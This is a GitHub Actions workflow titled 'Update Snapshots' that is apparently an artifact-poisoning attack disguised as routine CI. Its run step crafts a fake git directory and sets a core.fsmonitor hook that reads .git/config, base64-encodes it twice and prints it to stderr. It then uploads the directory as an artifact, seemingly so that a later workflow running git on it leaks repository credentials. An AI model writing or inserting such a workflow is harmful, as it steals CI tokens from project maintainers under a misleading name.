name: Update Snapshots

on:
  pull_request:

jobs:
  one:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
        with:
          persist-credentials: false

      - run: |
          mkdir -p metadata/.git/
          echo "../hop/.git/" > metadata/.git/commondir
          mkdir -p metadata/hop/
          cp -r .git/ metadata/hop/
          GIT_DIR=metadata/hop/.git git config --local core.fsmonitor 'cat .git/config | base64 -w0 | base64 -w0 >&2; false'
  
      - name: Save Snapshot Artifact
        uses: actions/upload-artifact@v2
        with:
          name: metadata
          path: ./metadata/
          retention-days: 1
